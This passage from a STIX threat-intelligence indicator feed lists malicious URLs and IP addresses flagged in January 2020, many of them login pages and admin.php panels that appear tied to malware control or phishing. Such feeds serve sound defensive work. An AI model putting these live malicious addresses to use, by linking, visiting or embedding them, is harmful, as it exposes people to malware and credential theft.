104.223.170.113","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '104.223.170.113']","type":"indicator","valid_from":"2020-01-24T03:00:01.726Z"} +{"created":"2020-01-24T03:00:01.762Z","description":"TS ID: 55250078011; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--0e10924c-745c-4a58-8e27-ab3a6bacd666","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-58"],"modified":"2020-01-24T03:00:01.762Z","name":"mal_url: http://tavim.org/includes/firmino/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://tavim.org/includes/firmino/admin.php']","type":"indicator","valid_from":"2020-01-24T03:00:01.762Z"} +{"created":"2020-01-24T03:00:10.928Z","description":"TS ID: 55250078015; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--c3fb816a-cc3b-4442-be4d-d62113ae5168","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-01-24T03:00:10.928Z","name":"mal_url: http://onlinesecuritycenter.xyz/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://onlinesecuritycenter.xyz/login']","type":"indicator","valid_from":"2020-01-24T03:00:10.928Z"} +{"created":"2020-01-24T03:00:20.166Z","description":"TS ID: 55250078029; iType: mal_url; State: active; Org: IT House, Ltd; Source: CyberCrime","id":"indicator--9159e46d-f3a4-464b-ac68-8beaf87e1a8f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-01-24T03:00:20.166Z","name":"mal_url: http://oaa-my.com/cutter/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://oaa-my.com/cutter/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-24T03:00:20.166Z"} +{"created":"2020-01-24T03:00:24.048Z","description":"TS ID: 55250078016; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--fefa8e76-ae0f-41ab-84e7-ea43ab055573","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-01-24T03:00:24.048Z","name":"mal_url: http://jumbajumbadun.fun/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://jumbajumbadun.fun/login']","type":"indicator","valid_from":"2020-01-24T03:00:24.048Z"} +{"created":"2020-01-24T03:00:55.816Z","description":"TS ID: 55250078024; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--6a76fa89-4d5f-40d0-9b03-671bdb2d5b4b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-58"],"modified":"2020-01-24T03:00:55.816Z","name":"mal_url: http://tavim.org/includes/salah/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://tavim.org/includes/salah/admin.php']","type":"indicator","valid_from":"2020-01-24T03:00:55.816Z"} +{"created":"2020-01-24T03:01:10.501Z","description":"TS ID: 55250078022; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--21055dfd-d0cb-42ec-93bd-ffaeadd11d80","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-80"],"modified":"2020-01-24T03:01:10.501Z","name":"mal_url: http://l0c23205.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://l0c23205.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-01-24T03:01:10.501Z"} +{"created":"2020-01-24T03:01:10.518Z","description":"TS ID: 55250078021; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--7471a595-e8b0-4c41-be4c-0a3e55675630","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-01-24T03:01:10.518Z","name":"mal_url: http://l535e9e5.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://l535e9e5.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-01-24T03:01:10.518Z"} +{"created":"2020-01-24T03:01:14.843Z","description":"TS ID: 55250078007; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--ead1e7e5-fdb3-47c2-9476-aa82741c038e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-01-24T03:01:14.843Z","name":"mal_ip: 217.8.117.47","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '217.8.117.47']","type":"indicator","valid_from":"2020-01-24T03:01:14.843Z"} +{"created":"2020-01-25T02:57:12.699Z","description":"TS ID: 55253484365; iType: mal_url; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime","id":"indicator--b0aee6bf-32f4-4f65-8de6-f65e04e92b15","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-01-25T02:57:12.699Z","name":"mal_url: http://46.161.27.57/northon/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://46.161.27.57/northon/']","type":"indicator","valid_from":"2020-01-25T02:57:12.699Z"} +{"created":"2020-01-25T02:57:28.034Z","description":"TS ID: 55253484350; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--54afbceb-72f3-484e-aee4-904f77beeff6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-01-25T02:57:28.034Z","name":"mal_url: http://104.168.99.170/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://104.168.99.170/login']","type":"indicator","valid_from":"2020-01-25T02:57:28.034Z"} +{"created":"2020-01-25T02:57:38.187Z","description":"TS ID: 55253484356; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--da030e10-af9f-462d-bda8-33abb223e950","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-01-25T02:57:38.187Z","name":"mal_url: http://officelog.org/inc/js/jstree/scan/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://officelog.org/inc/js/jstree/scan/panel/admin.php']","type":"indicator","valid_from":"2020-01-25T02:57:38.187Z"} +{"created":"2020-01-25T02:57:38.214Z","description":"TS ID: 55253484343; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--d38e051a-bc5b-4723-884a-65e017d98299","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-65"],"modified":"2020-01-25T02:57:38.214Z","name":"mal_url: http://f0391587.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0391587.xsph.ru/login']","type":"indicator","valid_from":"2020-01-25T02:57:38.214Z"} +{"created":"2020-01-25T02:57:47.281Z","description":"TS ID: 55253484367; iType: mal_url; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime","id":"indicator--46491826-6ba1-4217-a35e-1eb0081a9e6a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-01-25T02:57:47.281Z","name":"mal_url: http://46.161.27.57:8080/northon/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://46.161.27.57:8080/northon/']","type":"indicator","valid_from":"2020-01-25T02:57:47.281Z"} +{"created":"2020-01-25T02:57:51.296Z","description":"TS ID: 55253484342; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--b9715fd5-b89a-4859-b19f-55e052709227","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-79"],"modified":"2020-01-25T02:57:51.296Z","name":"mal_url: http://f0393086.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0393086.xsph.ru/login']","type":"indicator","valid_from":"2020-01-25T02:57:51.296Z"} +{"created":"2020-01-25T02:57:56.007Z","description":"TS ID: 55253484363; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--e3177515-f481-46c8-bad8-582ba0858ef3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-01-25T02:57:56.007Z","name":"mal_url: http://insuncos.com/files1/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://insuncos.com/files1/panel/admin.php']","type":"indicator","valid_from":"2020-01-25T02:57:56.007Z"} +{"created":"2020-01-25T02:57:56.044Z","description":"TS ID: 55253484339; iType: mal_url; State: active; Org: DDoS-GUARD GmbH; Source: CyberCrime","id":"indicator--33cdeaeb-5201-4fbb-b9ae-9c23377e7533","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-01-25T02:57:56.044Z","name":"mal_url: http://tg-h.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://tg-h.ru/login']","type":"indicator","valid_from":"2020-01-25T02:57:56.044Z"} +{"created":"2020-01-25T02:58:11.038Z","description":"TS ID: 55253484351; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--2baaa5f0-c2f6-4bd1-b59d-3a75931da735","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-01-25T02:58:11.038Z","name":"mal_url: http://wusetwo.xyz/public_html/file/five/inc/class/pCharts/info/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://wusetwo.xyz/public_html/file/five/inc/class/pCharts/info/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-25T02:58:11.038Z"} +{"created":"2020-01-25T02:58:20.42Z","description":"TS ID: 55253484366; iType: mal_url; State: active; Org: World Hosting Farm Limited; Source: CyberCrime","id":"indicator--f1bdef49-666f-46b5-a323-efa1f1446b62","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-64"],"modified":"2020-01-25T02:58:20.42Z","name":"mal_url: http://185.234.217.36/northon/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://185.234.217.36/northon/']","type":"indicator","valid_from":"2020-01-25T02:58:20.42Z"} +{"created":"2020-01-25T02:58:20.448Z","description":"TS ID: 55253484354; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime","id":"indicator--a173f4b1-67ce-44f8-a6d0-bd8a24e8c593","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-01-25T02:58:20.448Z","name":"mal_url: http://topik07.mcdir.ru/papka/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://topik07.mcdir.ru/papka/admin.php']","type":"indicator","valid_from":"2020-01-25T02:58:20.448Z"} +{"created":"2020-01-25T02:58:33.189Z","description":"TS ID: 55253484362; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--b53dded1-d293-4cd1-9e63-b6e0cbd850f0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-01-25T02:58:33.189Z","name":"mal_url: http://insuncos.com/files2/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://insuncos.com/files2/panel/admin.php']","type":"indicator","valid_from":"2020-01-25T02:58:33.189Z"} +{"created":"2020-01-25T02:58:49.056Z","description":"TS ID: 55253484364; iType: mal_url; State: active; Org: World Hosting Farm Limited; Source: CyberCrime","id":"indicator--2b30f8fe-13e8-4a7d-8eba-3e59c288bef7","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-47"],"modified":"2020-01-25T02:58:49.056Z","name":"mal_url: http://185.234.218.68/kaspersky/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://185.234.218.68/kaspersky/']","type":"indicator","valid_from":"2020-01-25T02:58:49.056Z"} +{"created":"2020-01-25T02:58:59.472Z","description":"TS ID: 55253484357; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--f502199a-17a4-404b-a114-fb5eda28c32c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-01-25T02:58:59.472Z","name":"mal_url: http://officelog.org/inc/js/jstree/mh/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://officelog.org/inc/js/jstree/mh/panel/admin.php']","type":"indicator","valid_from":"2020-01-25T02:58:59.472Z"} +{"created":"2020-01-25T02:59:27.07Z","description":"TS ID: 55253484359; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--af7422eb-5d8e-4878-bdd1-395313434dae","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-01-25T02:59:27.07Z","name":"mal_url: http://officelog.org/inc/js/jstree/ch/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://officelog.org/inc/js/jstree/ch/panel/admin.php']","type":"indicator","valid_from":"2020-01-25T02:59:27.07Z"} +{"created":"2020-01-25T02:59:28.967Z","description":"TS ID: 55253484358; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--71b36c05-86dd-4685-81c0-5a99e2e14c23","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-01-25T02:59:28.967Z","name":"mal_url: http://officelog.org/inc/js/jstree/dar/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://officelog.org/inc/js/jstree/dar/panel/admin.php']","type":"indicator","valid_from":"2020-01-25T02:59:28.967Z"} +{"created":"2020-01-25T02:59:37.661Z","description":"TS ID: 55253484352; iType: mal_url; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime","id":"indicator--9d948509-dfb4-45b6-b8bc-780df88a213f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-01-25T02:59:37.661Z","name":"mal_url: http://oaa-my.com/cage/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://oaa-my.com/cage/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-25T02:59:37.661Z"} +{"created":"2020-01-25T02:59:37.692Z","description":"TS ID: 55253484224; iType: mal_ip; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--9f613f8e-2040-4eee-8044-044023a8093e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-53"],"modified":"2020-01-25T02:59:37.692Z","name":"mal_ip: 192.64.118.56","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '192.64.118.56']","type":"indicator","valid_from":"2020-01-25T02:59:37.692Z"} +{"created":"2020-01-25T02:59:54.296Z","description":"TS ID: 55253484361; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--518c3959-6c26-413f-9a5f-c8f76d86185a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-01-25T02:59:54.296Z","name":"mal_url: http://insuncos.com/files3/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://insuncos.com/files3/panel/admin.php']","type":"indicator","valid_from":"2020-01-25T02:59:54.296Z"} +{"created":"2020-01-25T02:59:57.748Z","description":"TS ID: 55253484347; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime","id":"indicator--625b94ec-2304-4502-a2eb-59d52cdb9c1f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-80"],"modified":"2020-01-25T02:59:57.748Z","name":"mal_url: http://t95212tt.beget.tech/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://t95212tt.beget.tech/login']","type":"indicator","valid_from":"2020-01-25T02:59:57.748Z"} +{"created":"2020-01-25T03:00:22.168Z","description":"TS ID: 55253484349; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--c8f76b97-051f-4fab-b57f-a57f37480aa0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-01-25T03:00:22.168Z","name":"mal_url: http://kiototan.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://kiototan.site/login']","type":"indicator","valid_from":"2020-01-25T03:00:22.168Z"} +{"created":"2020-01-25T03:00:27.279Z","description":"TS ID: 55253484353; iType: mal_ip; State: active; Org: Com Telecom; Source: CyberCrime","id":"indicator--7abc3f41-e952-481f-8bf7-7b52af05451f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-62"],"modified":"2020-01-25T03:00:27.279Z","name":"mal_ip: 176.107.160.43","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '176.107.160.43']","type":"indicator","valid_from":"2020-01-25T03:00:27.279Z"} +{"created":"2020-01-25T03:00:29.248Z","description":"TS ID: 55253484340; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--72334129-8d1c-4cac-bde6-2d5d6316e266","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-01-25T03:00:29.248Z","name":"mal_url: http://newfoundfriend.xyz/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://newfoundfriend.xyz/login']","type":"indicator","valid_from":"2020-01-25T03:00:29.248Z"} +{"created":"2020-01-25T03:01:03.628Z","description":"TS ID: 55253484360; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--a3f8f1e3-77c5-442d-a918-5d3d800a8357","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-01-25T03:01:03.628Z","name":"mal_url: http://officelog.org/inc/js/jstree/bi/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://officelog.org/inc/js/jstree/bi/panel/admin.php']","type":"indicator","valid_from":"2020-01-25T03:01:03.628Z"} +{"created":"2020-01-25T03:01:03.65Z","description":"TS ID: 55253484355; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--49bac194-cefe-4c31-81eb-cc81a3a3bb26","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-01-25T03:01:03.65Z","name":"mal_url: http://officelog.org/inc/js/jstree/vic/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://officelog.org/inc/js/jstree/vic/panel/admin.php']","type":"indicator","valid_from":"2020-01-25T03:01:03.65Z"} +{"created":"2020-01-26T02:54:41.651Z","description":"TS ID: 55256890160; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--ec5f9f49-249b-4fc4-bb91-849c892c7453","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-01-26T02:54:41.651Z","name":"mal_url: http://45.139.236.48/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://45.139.236.48/login']","type":"indicator","valid_from":"2020-01-26T02:54:41.651Z"} +{"created":"2020-01-26T02:54:41.675Z","description":"TS ID: 55256890149; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--3e082be1-f6be-45f6-811b-5e63e2a596c5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-91"],"modified":"2020-01-26T02:54:41.675Z","name":"mal_url: http://privatepp.club/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://privatepp.club/login']","type":"indicator","valid_from":"2020-01-26T02:54:41.675Z"} +{"created":"2020-01-26T02:54:41.705Z","description":"TS ID: 55256890147; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--95774d83-e0e1-45e4-ab1c-1bb27588fa92","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-74"],"modified":"2020-01-26T02:54:41.705Z","name":"mal_url: http://109.94.208.144/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://109.94.208.144/login']","type":"indicator","valid_from":"2020-01-26T02:54:41.705Z"} +{"created":"2020-01-26T02:55:15.583Z","description":"TS ID: 55256890123; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--0149e0f7-629c-41c5-a1e7-144b3c22d362","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-32"],"modified":"2020-01-26T02:55:15.583Z","name":"mal_url: http://45.14.50.207/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://45.14.50.207/panel/admin.php']","type":"indicator","valid_from":"2020-01-26T02:55:15.583Z"} +{"created":"2020-01-26T02:55:15.785Z","description":"TS ID: 55256890140; iType: mal_url; State: active; Org: Global Data Networks LLC; Source: CyberCrime","id":"indicator--751f6e49-92d5-4ff4-9245-870a49dce478","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-01-26T02:55:15.785Z","name":"mal_url: http://molmarsl.com/leks/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://molmarsl.com/leks/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-26T02:55:15.785Z"} +{"created":"2020-01-26T02:55:22.112Z","description":"TS ID: 55256890166; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--e0bdcebe-2f97-4f8f-ad51-0b0c06b5071c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-01-26T02:55:22.112Z","name":"mal_url: http://pecunia110011.at/iteat/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://pecunia110011.at/iteat/']","type":"indicator","valid_from":"2020-01-26T02:55:22.112Z"} +{"created":"2020-01-26T02:55:31.348Z","description":"TS ID: 55256890144; iType: mal_url; State: active; Org: Telecommunication Systems, LLC; Source: CyberCrime","id":"indicator--82f02b81-cfae-4bee-b85d-daf900c93936","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-69"],"modified":"2020-01-26T02:55:31.348Z","name":"mal_url: http://188.127.230.249/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://188.127.230.249/login']","type":"indicator","valid_from":"2020-01-26T02:55:31.348Z"} +{"created":"2020-01-26T02:55:32.119Z","description":"TS ID: 55256890158; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--1e540e5a-6fa3-4758-ab61-0d7692fb3d96","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-01-26T02:55:32.119Z","name":"mal_url: http://jor1.berbagsansa.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://jor1.berbagsansa.com/login']","type":"indicator","valid_from":"2020-01-26T02:55:32.119Z"} +{"created":"2020-01-26T02:55:33.623Z","description":"TS ID: 55256890152; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--cbfc3b5d-645b-4114-ab89-7ab5b745d230","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-48"],"modified":"2020-01-26T02:55:33.623Z","name":"mal_url: http://92.63.192.190/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://92.63.192.190/login']","type":"indicator","valid_from":"2020-01-26T02:55:33.623Z"} +{"created":"2020-01-26T02:55:33.646Z","description":"TS ID: 55256890143; iType: mal_url; State: active; Org: Offshore Racks S.A; Source: CyberCrime","id":"indicator--f4cf51da-17db-4d9b-bb65-efeb1373f01b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-21"],"modified":"2020-01-26T02:55:33.646Z","name":"mal_url: http://190.14.38.202/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://190.14.38.202/login']","type":"indicator","valid_from":"2020-01-26T02:55:33.646Z"} +{"created":"2020-01-26T02:55:33.681Z","description":"TS ID: 55256890162; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--6e4e6382-002d-473a-a635-cc00d4917353","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-01-26T02:55:33.681Z","name":"mal_url: http://45.132.104.20/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://45.132.104.20/login']","type":"indicator","valid_from":"2020-01-26T02:55:33.681Z"} +{"created":"2020-01-26T02:55:33.738Z","description":"TS ID: 55256890138; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--33552aa0-5a5a-47a6-b529-a810dcf8c9af","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-28"],"modified":"2020-01-26T02:55:33.738Z","name":"mal_url: http://aboutworld.info/manage/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://aboutworld.info/manage/admin.php']","type":"indicator","valid_from":"2020-01-26T02:55:33.738Z"} +{"created":"2020-01-26T02:55:33.959Z","description":"TS ID: 55256890146; iType: mal_url; State: active; Org: Dzinet Ltd.; Source: CyberCrime","id":"indicator--cd8459e5-367f-46b2-91e7-9893c766091a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-01-26T02:55:33.959Z","name":"mal_url: http://176.113.115.205/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://176.113.115.205/login']","type":"indicator","valid_from":"2020-01-26T02:55:33.959Z"} +{"created":"2020-01-26T02:55:33.984Z","description":"TS ID: 55256890128; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime","id":"indicator--274a9145-93f7-4146-a879-68fce2fc1188","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-01-26T02:55:33.984Z","name":"mal_url: http://10121.165-227-83-163.site/admin/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://10121.165-227-83-163.site/admin/']","type":"indicator","valid_from":"2020-01-26T02:55:33.984Z"} +{"created":"2020-01-26T02:55:34.637Z","description":"TS ID: 55256890132; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime","id":"indicator--ea0abbe1-3033-4549-8ba0-626f43807986","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-01-26T02:55:34.637Z","name":"mal_url: http://1926.165-227-83-163.site/admin/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://1926.165-227-83-163.site/admin/']","type":"indicator","valid_from":"2020-01-26T02:55:34.637Z"} +{"created":"2020-01-26T02:55:44.765Z","description":"TS ID: 55256890120; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--c7c3a0d7-fccd-4bc0-9011-a6c91f967402","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-01-26T02:55:44.765Z","name":"mal_ip: 45.139.236.6","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '45.139.236.6']","type":"indicator","valid_from":"2020-01-26T02:55:44.765Z"} +{"created":"2020-01-26T02:55:48.315Z","description":"TS ID: 55256890150; iType: mal_ip; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--383708ec-c15c-400a-94fc-40d6ac5ab8e3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-01-26T02:55:48.315Z","name":"mal_ip: 92.63.197.185","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '92.63.197.185']","type":"indicator","valid_from":"2020-01-26T02:55:48.315Z"} +{"created":"2020-01-26T02:55:48.35Z","description":"TS ID: 55256890136; iType: mal_url; State: active; Org: GoDaddy.com, LLC; Source: CyberCrime","id":"indicator--14c3d4da-f364-4af0-96ba-ce8959da560b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-01-26T02:55:48.35Z","name":"mal_url: 